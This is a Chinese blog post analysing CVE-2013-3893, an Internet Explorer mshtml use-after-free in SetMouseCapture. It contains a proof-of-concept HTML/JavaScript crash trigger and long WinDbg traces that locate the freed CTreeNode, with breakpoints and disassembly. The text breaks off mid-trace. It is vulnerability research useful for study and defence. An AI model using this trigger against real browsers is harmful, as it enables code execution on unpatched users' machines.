CVE-2013-3893
发布者:Ox9A82
发布于:2016-08-22 21:48
前方高能!!!这篇博文比较长,因为我把完整的调试过程都记录下来了,感兴趣的童鞋可以看下。没有耐心的童鞋可以直接跳到最后看总结:)
Microsoft Internet Explorer 远程代码执行漏洞(CNNVD-201309-304)
Internet Explorer(IE)是美国微软(Microsoft)公司开发的一款Web浏览器,是Windows操作系统附带的默认浏览器。
Microsoft IE 6至11版本中的mshtml.dll文件中的SetMouseCapture功能实现中存在远程代码执行漏洞,该漏洞源于程序访问内存中已被删除或尚未正确分配的对象。攻击者可借助特制的网站并诱使用户查看该网站,利用该漏洞在IE中的当前用户的上下文中执行任意代码,可造成内存损坏。成功利用此漏洞的攻击者可获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
POC如下
<html> <script> function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); } </script> </html>
程序crash到如下所示的情况,其中edi的值触发了异常。经过分析后发现,edi的值来自于上层函数的传递。并且这个edi的值处于一个已经释放的堆中,调试记录如下所示。
1:021> g (ed4.bd8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0 eip=656c1f60 esp=041ce618 ebp=041ce620 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDoc::HasContainerCapture+0x14: 656c1f60 8b0f mov ecx,dword ptr [edi] ds:0023:074a9fb0=???????? 1:021> !heap -p -a edi address 074a9fb0 found in _DPH_HEAP_ROOT @ 1201000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 7392478: 74a9000 2000 6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2 771e5674 ntdll!RtlDebugFreeHeap+0x0000002f 771a7aca ntdll!RtlpFreeHeap+0x0000005d 77172d68 ntdll!RtlFreeHeap+0x00000142 75a5f1ac kernel32!HeapFree+0x00000014 656be590 mshtml!CTreeNode::Release+0x0000002d 656d15b1 mshtml!CMarkup::UnloadContents+0x00000380 656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055 656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049 655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0 65502bb4 mshtml!CDocument::open+0x00000426 65500789 mshtml!CDocument::write+0x0000007c 655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085 656e235c mshtml!CBase::ContextInvokeEx+0x000005dc 656e25d5 mshtml!CBase::InvokeEx+0x00000025 656edf9a mshtml!DispatchInvokeCollection+0x0000014c 656a4998 mshtml!CDocument::InvokeEx+0x000000f0 65693148 mshtml!CBase::VersionedInvokeEx+0x00000020 65693104 mshtml!PlainInvokeEx+0x000000eb 6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104 6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a 6b4ea3f6 jscript!InvokeDispatchEx+0x00000098 6b4ea4a0 jscript!VAR::InvokeByName+0x00000139 6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d 6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce 6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80 6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce 6b4f5bfb jscript!ScrFncObj::Call+0x0000008d 6b4f5e11 jscript!CSession::Execute+0x0000015f 6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5 6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c 65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
这里可以看出edi为一个已经释放的CTreeNode对象的指针,栈回溯如下
1:021> KV ChildEBP RetAddr Args to Child 0428e510 656c1a82 00000000 069f4ff0 05538680 mshtml!CDoc::HasContainerCapture+0x14 0428e594 6573163d 0428e5b8 00000000 00000000 mshtml!CDoc::PumpMessage+0x3e4 0428e650 657f580d 0614fff0 00000001 069f4ff0 mshtml!CDoc::SetMouseCapture+0xe7 0428e678 654da5d0 07689fc8 0000ffff 0495bfd0 mshtml!CElement::setCapture+0x51 0428e6a0 656e235c 07689fc8 0495bfd0 07665fd8 mshtml!Method_void_oDoVARIANTBOOL+0xc5 0428e714 656ec75a 07689fc8 80010410 00000001 mshtml!CBase::ContextInvokeEx+0x5dc 0428e764 656ec79a 07689fc8 80010410 00000001 mshtml!CElement::ContextInvokeEx+0x9d 0428e790 65693104 07689fc8 80010410 00000001 mshtml!CInput::VersionedInvokeEx+0x2d 0428e7e4 6a58a22a 076abfd8 80010410 00000001 mshtml!PlainInvokeEx+0xeb 0428e820 6a58a175 06eb0d10 80010410 00000409 jscript!IDispatchExInvokeEx2+0x104 0428e85c 6a58a3f6 06eb0d10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a 0428e91c 6a58a4a0 80010410 00000001 00000000 jscript!InvokeDispatchEx+0x98 0428e950 6a59d8c8 06eb0d10 0428e984 00000001 jscript!VAR::InvokeByName+0x139 0428e99c 6a59d96f 06eb0d10 00000001 00000000 jscript!VAR::InvokeDispName+0x7d 0428e9c8 6a59e3e7 06eb0d10 00000000 00000001 jscript!VAR::InvokeByDispID+0xce 0428eb64 6a595c9d 0428eb7c 00000000 0493ef88 jscript!CScriptRuntime::Run+0x2b80 0428ec4c 6a595bfb 00000000 00000000 0493cf70 jscript!ScrFncObj::CallWithFrameOnStack+0xce 0428ec94 6a5974ac 00000000 00000000 0493cf70 jscript!ScrFncObj::Call+0x8d 0428ed18 6a594ea4 06eb2fa0 06eb0d10 00000001 jscript!NameTbl::InvokeInternal+0x141 0428ed4c 6a59e3e7 06eb0d10 00000000 00000001 jscript!VAR::InvokeByDispID+0x17f
查看调用
1:021> UB 656c1a82 mshtml!CDoc::PumpMessage+0x3c0: 656c1a5e 81a7580700007fffffff and dword ptr [edi+758h],0FFFFFF7Fh 656c1a68 57 push edi 656c1a69 e8eafdffff call mshtml!CDoc::ReleaseDetachedCaptures (656c1858) 656c1a6e 837c242c00 cmp dword ptr [esp+2Ch],0 656c1a73 7415 je mshtml!CDoc::PumpMessage+0x444 (656c1a8a) 656c1a75 8b7c2410 mov edi,dword ptr [esp+10h] 656c1a79 8b4c2414 mov ecx,dword ptr [esp+14h] 656c1a7d e8c6040000 call mshtml!CDoc::HasContainerCapture (656c1f48)
但是这样我们对于重用还是看不出个所以然来,这也是ie漏洞分析的难点所在,必须从执行流程入手才能分析明白。
现在我们已经做出了猜测,uaf对象是某个元素的CTreeNode对象,这样我们就可以尝试一下CTreeNode的通用断点。
断下创建:CTreeNode::CTreeNode 释放:CTreeNode::Release
bu mshtml!CTreeNode::Release "ln poi(poi(edx));.echo ==CTreeNode释放==;gc;"
在poc里加上辅助语句来帮助调试
Math.tan(3,4); bu jscript!tan
先断在tan上再去下记录断点,这样可以避免非poc的元素进行干扰
1:021> g (690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information> ==CTreeNode释放== (690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information> ==CTreeNode释放== (690fc2e8) mshtml!CGenericElement::`vftable' | (69234ce0) mshtml!CHeaderElement::`vftable' Exact matches: mshtml!CGenericElement::`vftable' = <no type information> ==CTreeNode释放== (690d70e0) mshtml!CPhraseElement::`vftable' | (690d7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information> ==CTreeNode释放== (6921d3a8) mshtml!CHeadElement::`vftable' | (6921d0d8) mshtml!CHtmlElement::`vftable' Exact matches: mshtml!CHeadElement::`vftable' = <no type information> ==CTreeNode释放== (6921d628) mshtml!CTitleElement::`vftable' | (690d5900) mshtml!CMetaElement::`vftable' Exact matches: mshtml!CTitleElement::`vftable' = <no type information> ==CTreeNode释放== (69245438) mshtml!CScriptElement::`vftable' | (69245724) mshtml!CScriptElement::DownLoadScript Exact matches: mshtml!CScriptElement::`vftable' = <no type information> ==CTreeNode释放== (69226670) mshtml!CBodyElement::`vftable' | (69289108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information> ==CTreeNode释放== (6921d0d8) mshtml!CHtmlElement::`vftable' | (6921d359) mshtml!CHeadElement::CreateElement Exact matches: mshtml!CHtmlElement::`vftable' = <no type information> ==CTreeNode释放== (6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable' Exact matches: mshtml!CRootElement::`vftable' = <no type information> ==CTreeNode释放== (6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable' Exact matches: mshtml!CRootElement::`vftable' = <no type information> ==CTreeNode释放== (6921a9a8) mshtml!CRootElement::`vftable' | (69288ba0) mshtml!CDisplayPointer::`vftable' Exact matches: mshtml!CRootElement::`vftable' = <no type information> ==CTreeNode释放==
crashed....
这样就得到了完整的CTreeNode释放流程,在记录时加上r edi再与crash对比即可。
bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));gc;"
这次可以看到CTreeNode对象的地址,对比crash时的对象地址
1:021> g ==CTreeNode释放== edx=10d34fb0 (6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information> ==CTreeNode释放== edx=0a2a4fb0 (6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information> ==CTreeNode释放== edx=132dafb0 (6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable' Exact matches: mshtml!CGenericElement::`vftable' = <no type information> ==CTreeNode释放== edx=132dafb0 (6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable' Exact matches: mshtml!CGenericElement::`vftable' = <no type information> ==CTreeNode释放== edx=0a2a4fb0 (6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information> ==CTreeNode释放== edx=0d152fb0 (6a23d3a8) mshtml!CHeadElement::`vftable' | (6a23d0d8) mshtml!CHtmlElement::`vftable' Exact matches: mshtml!CHeadElement::`vftable' = <no type information> ==CTreeNode释放== edx=13f3afb0 (6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable' Exact matches: mshtml!CTitleElement::`vftable' = <no type information> ==CTreeNode释放== edx=13f3afb0 (6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable' Exact matches: mshtml!CTitleElement::`vftable' = <no type information> ==CTreeNode释放== edx=13f3afb0 (6a23d628) mshtml!CTitleElement::`vftable' | (6a0f5900) mshtml!CMetaElement::`vftable' Exact matches: mshtml!CTitleElement::`vftable' = <no type information> ==CTreeNode释放== edx=13358fb0 (6a265438) mshtml!CScriptElement::`vftable' | (6a265724) mshtml!CScriptElement::DownLoadScript Exact matches: mshtml!CScriptElement::`vftable' = <no type information> ==CTreeNode释放== edx=07636fb0 (6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information> ==CTreeNode释放== edx=0e418fb0 (6a23d0d8) mshtml!CHtmlElement::`vftable' | (6a23d359) mshtml!CHeadElement::CreateElement Exact matches: mshtml!CHtmlElement::`vftable' = <no type information> ==CTreeNode释放== edx=14ec8fb0 (6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable' Exact matches: mshtml!CRootElement::`vftable' = <no type information> ==CTreeNode释放== edx=14ec8fb0 (6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable' Exact matches: mshtml!CRootElement::`vftable' = <no type information> ==CTreeNode释放== edx=14ec8fb0 (6a23a9a8) mshtml!CRootElement::`vftable' | (6a2a8ba0) mshtml!CDisplayPointer::`vftable' Exact matches: mshtml!CRootElement::`vftable' = <no type information> (9bc.eb4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=03eee688 ecx=062fa680 edx=03eee3c0 esi=00000000 edi=07636fb0 eip=6a301f60 esp=03eee5d8 ebp=03eee5e0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDoc::HasContainerCapture+0x14: 6a301f60 8b0f mov ecx,dword ptr [edi] ds:0023:07636fb0=????????
这样对比可以看出是mshtml!CBodyElement对象对应的CTreeNode对象导致的uaf。对于exploiter来说uaf漏洞最重要的是uaf对象是在哪一瞬间被释放的,只有知道了这一点才能占位。
bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));.if(edx==07636fb0){}.else{gc;}"
但是发现这样是断不下来的,因为堆每次分配都是不一样的。
只好去掉gc手动跟到
==CTreeNode释放==
edx=07636fb0 (6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information>
1:021> kv ChildEBP RetAddr Args to Child 0437d520 6a310a05 0753ff64 0753ff30 0753ff30 mshtml!CTreeNode::Release (FPO: [0,0,0]) 0437d584 6a3115b1 0753ff30 00000001 00000001 mshtml!CMarkup::DestroySplayTree+0x285 0437d5f0 6a312a8a 00000000 00000001 0753ff30 mshtml!CMarkup::UnloadContents+0x380 0437d60c 6a312a15 0753ff30 00000001 00000001 mshtml!CMarkup::TearDownMarkupHelper+0x55 0437d638 6a1f3b5e 00000001 00000001 076c8f30 mshtml!CMarkup::TearDownMarkup+0x49 0437d6a0 6a142bb4 076c8f30 00000000 00000003 mshtml!COmWindowProxy::SwitchMarkup+0x5a0 0437d79c 6a140789 060e2fc8 00000000 00000000 mshtml!CDocument::open+0x426 0437d818 6a1f3267 060e2fc8 08df5fe8 08c0cfd0 mshtml!CDocument::write+0x7c 0437d838 6a32235c 060e2fc8 08c0cfd0 08df1fd8 mshtml!Method_void_SAFEARRAYPVARIANTP+0x85 0437d8ac 6a3225d5 060e2fc8 0000041e 00000001 mshtml!CBase::ContextInvokeEx+0x5dc 0437d8d8 6a32df9a 060e2fc8 0000041e 00000001 mshtml!CBase::InvokeEx+0x25 0437d928 6a2e4998 060e2fc8 0000000b 0000041e mshtml!DispatchInvokeCollection+0x14c 0437d970 6a2d3148 060e2fc8 0000041e 00000001 mshtml!CDocument::InvokeEx+0xf0 0437d998 6a2d3104 060e2fc8 0000041e 00000001 mshtml!CBase::VersionedInvokeEx+0x20 0437d9ec 6c75a22a 08dbafd8 0000041e 00000001 mshtml!PlainInvokeEx+0xeb 0437da28 6c75a175 06ebad10 0000041e 00000409 jscript!IDispatchExInvokeEx2+0x104 0437da64 6c75a3f6 06ebad10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a 0437db24 6c75a4a0 0000041e 00000001 00000000 jscript!InvokeDispatchEx+0x98 0437db58 6c76d8c8 06ebad10 0437db8c 00000001 jscript!VAR::InvokeByName+0x139 0437dba4 6c76d96f 06ebad10 00000001 00000000 jscript!VAR::InvokeDispName+0x7d
其实这个栈回溯并不能看出什么,但可作为以后的参考。此时回头看下poc,createElement可通过CElement::CElement下断监控到,但appendChild并不熟悉。可以肯定的是这个函数继承自CElement类。
; Attributes: bp-based frame ; public: long __stdcall CElement::appendChild(struct IHTMLDOMNode *, struct IHTMLDOMNode * *) ?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z proc near var_10= word ptr -10h arg_0= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h mov edi, edi push ebp mov ebp, esp and esp, 0FFFFFFF8h sub esp, 10h push esi push edi ; pvarg push [ebp+arg_8] xor eax, eax lea edi, [esp+1Ch+var_10] stosd stosd stosd stosd sub esp, 10h xor eax, eax mov edi, esp push [ebp+arg_4] inc eax push [ebp+arg_0] mov [esp+34h+var_10], ax lea esi, [esp+34h+var_10] movsd movsd movsd movsd call ?insertBefore@CElement@@QAGJPAUIHTMLDOMNode@@UtagVARIANT@@PAPAU2@@Z ; CElement::insertBefore(IHTMLDOMNode *,tagVARIANT,IHTMLDOMNode * *) lea esi, [esp+18h+var_10] mov edi, eax call _VariantClear@4 ; VariantClear(x) mov eax, edi pop edi pop esi mov esp, ebp pop ebp retn 0Ch ?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z endp ; sp-analysis failed
由js知识可以知道appendChild是向标签中增加子节点的
实例: var div=document.createElement("div");//新建一个div元素节点 document.body.appendChild(div);//把div元素节点添加到body元素节点中成为其子节点,但是放在body的现有子节点的最后
最后函数会经过一番调用,调用到CTreeNode::CTreeNode函数以初始化一个CTreeNode对象,下面来调试一下这个过程
<html> <script> function trigger() { Math.tan(3,4); var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); Math.cos(3,4); document.body.appendChild(id_0); Math.sin(3,4); document.body.appendChild(id_1); Math.tan(3,4); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); } </script> </html>
如上在poc中增设辅助调试语句
Breakpoint 0 hit eax=00000000 ebx=0411e380 ecx=00000005 edx=00000003 esi=0411e370 edi=0411e370 eip=6c77d8c0 esp=0411e274 ebp=0411e2b0 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 jscript!tan: 6c77d8c0 ff258010756c jmp dword ptr [jscript!_imp__tan (6c751080)] ds:0023:6c751080={msvcrt!tan (773dde34)}
1:021> bu mshtml!CreateElement Matched: 6a23d88c mshtml!CreateElement = <no type information> Matched: 6a234bb0 mshtml!CreateElement = <no type information> Ambiguous symbol error at 'mshtml!CreateElement' 1:021> bu 6a23d88c 1:021> bu 6a234bb0 1:021> bu jscript!cos 1:021> g Breakpoint 2 hit eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement: 6a234bb0 8bff mov edi,edi
来跟一下mshtml!CreateElement函数,我之前已经在ie调试心得里提到过了
1:021> g Breakpoint 2 hit eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement: 6a234bb0 8bff mov edi,edi 1:021> p Breakpoint 2 hit eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement: 6a234bb0 8bff mov edi,edi 1:021> eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x2: 6a234bb2 55 push ebp 1:021> eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x3: 6a234bb3 8bec mov ebp,esp 1:021> eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x5: 6a234bb5 83ec10 sub esp,10h 1:021> eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x8: 6a234bb8 53 push ebx 1:021> eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x9: 6a234bb9 8b5d10 mov ebx,dword ptr [ebp+10h] ss:0023:0425e688=00000000 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bbc esp=0425e664 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0xc: 6a234bbc 56 push esi 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bbd esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0xd: 6a234bbd c7451000000000 mov dword ptr [ebp+10h],0 ss:0023:0425e688=00000000 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x14: 6a234bc4 85db test ebx,ebx 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x16: 6a234bc6 0f84c67d0300 je mshtml!CreateElement+0x18 (6a26c992) [br=1] 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a26c992 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x18: 6a26c992 bb08832a6a mov ebx,offset mshtml!g_Zero (6a2a8308) 1:021> eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a26c997 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x1d: 6a26c997 e93082fcff jmp mshtml!CreateElement+0x1d (6a234bcc) 1:021> eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bcc esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x1d: 6a234bcc 0fb64701 movzx eax,byte ptr [edi+1] ds:0023:0425e6a9=60 1:021> eax=00000060 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x21: 6a234bd0 c1e004 shl eax,4 1:021> eax=00000600 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x24: 6a234bd3 05709a2c6a add eax,offset mshtml!g_atagdesc (6a2c9a70) 1:021> eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x29: 6a234bd8 0f84b34e1500 je mshtml!CreateElement+0x2b (6a389a91) [br=0] 1:021> eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234bde esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x38: 6a234bde 8b4008 mov eax,dword ptr [eax+8] ds:0023:6a2ca078={mshtml!CPhraseElement::CreateElement (6a269f4b)} 1:021> eax=6a269f4b ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234be1 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x3b: 6a234be1 8d4d10 lea ecx,[ebp+10h] 1:021> eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234be4 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x3e: 6a234be4 51 push ecx 1:021> eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234be5 esp=0425e65c ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x3f: 6a234be5 52 push edx 1:021> eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234be6 esp=0425e658 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x40: 6a234be6 57 push edi 1:021> eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8 eip=6a234be7 esp=0425e654 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x41: 6a234be7 ffd0 call eax {mshtml!CPhraseElement::CreateElement (6a269f4b)} 1:021> ln eax (6a269f4b) mshtml!CPhraseElement::CreateElement | (6a269fdd) mshtml!FindPeer Exact matches: mshtml!CPhraseElement::CreateElement = <no type information>
可见var id_0 = document.createElement("sup");导致了CPhraseElement对象的创建
bu mshtml!CElement::CElement
来看下这个对象的内容,虽然估计与漏洞触发关系不大
1:021> p Breakpoint 6 hit eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a23480f esp=0425e638 ebp=0425e64c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement: 6a23480f 8bff mov edi,edi 1:021> eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a234811 esp=0425e638 ebp=0425e64c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0x2: 6a234811 55 push ebp 1:021> eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a234812 esp=0425e634 ebp=0425e64c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0x3: 6a234812 8bec mov ebp,esp 1:021> eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a234814 esp=0425e634 ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0x5: 6a234814 53 push ebx 1:021> eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a234815 esp=0425e630 ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 